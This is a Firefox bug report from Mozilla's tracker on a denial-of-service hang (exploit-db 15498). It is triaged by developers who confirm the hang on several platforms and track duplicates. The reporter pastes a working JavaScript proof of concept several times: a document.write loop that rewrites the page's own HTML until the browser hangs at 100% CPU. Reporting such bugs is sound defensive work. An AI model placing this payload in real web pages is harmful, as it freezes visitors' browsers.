document.write(document.body.innerHTML) DOS Attack (hang with 100% CPU) (exploit-db 15498) (missing slow script dialog)

Status: NEW, Unassigned

Product: Firefox
Component: General
Opened 7 years ago, updated 2 years ago

People: Reporter: Yusuf Şen; Assignee: Unassigned

Tracking: Depends on: 1 bug; Keywords: hang
Version: unspecified
Platform: x86, Windows XP

Firefox Tracking Flags: blocking2.0 -, status1.9.2 wanted, status1.9.1 wanted

Details: Whiteboard: [sg:dos]

(Reporter)

Description

7 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>

Reproducible: Always

Steps to Reproduce:
1. Ddos Attack
Actual Results:  
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>

Expected Results:  
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>
(Reporter)

Comment 1

7 years ago
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>
(Reporter)

Updated

7 years ago
blocking1.9.1: --- → ?
blocking1.9.2: --- → ?
blocking2.0: --- → ?
(Reporter)

Comment 2

7 years ago
http://www.cyber-heaven.tk
This was published 2010-11-12 at http://www.exploit-db.com/exploits/15498/
I don't see any crash using Fx 3.6.12 on WinXP, just a 100% CPU hang.
Keywords: hang
We probably didn't need 5 copies of the code in-line...

Since it's public at exploit-db there's no point in keeping the bug hidden, we'll just get dupes.
Group: core-security
Summary: ddos Atack Crashed → dos Atack Crashed (exploit-db 15498)
Whiteboard: [sg:dos]
blocking1.9.1: ? → ---
blocking1.9.2: ? → ---
status1.9.1: --- → wanted
status1.9.2: --- → wanted
Summary: dos Atack Crashed (exploit-db 15498) → dos Attack Crashed (exploit-db 15498)
Is 4.0 afflicted?

Updated

7 years ago
Duplicate of this bug: 612365

Updated

7 years ago
Summary: dos Attack Crashed (exploit-db 15498) → dos Attack (hang with 100% CPU) (exploit-db 15498)
(In reply to comment #6)
> Is 4.0 afflicted?

Yes, in the same way as 3.6.12: 100% CPU, no crash, no "slow script" dialog.
Tested on Linux, WinXP and OSX.  On Linux, the OOM killer kills the process
after ~10 seconds.
Duplicate of this bug: 612597
We should at least figure out if we can make the slow-script dialog show up.
Status: UNCONFIRMED → NEW
Ever confirmed: true
blocking2.0: ? → -

Updated

4 years ago
Duplicate of this bug: 833874

Updated

4 years ago
Depends on: 641105
Summary: dos Attack (hang with 100% CPU) (exploit-db 15498) → document.write(document.body.innerHTML) DOS Attack (hang with 100% CPU) (exploit-db 15498) (missing slow script dialog)

Updated

4 years ago
Duplicate of this bug: 771622

Updated

4 years ago
Duplicate of this bug: 744637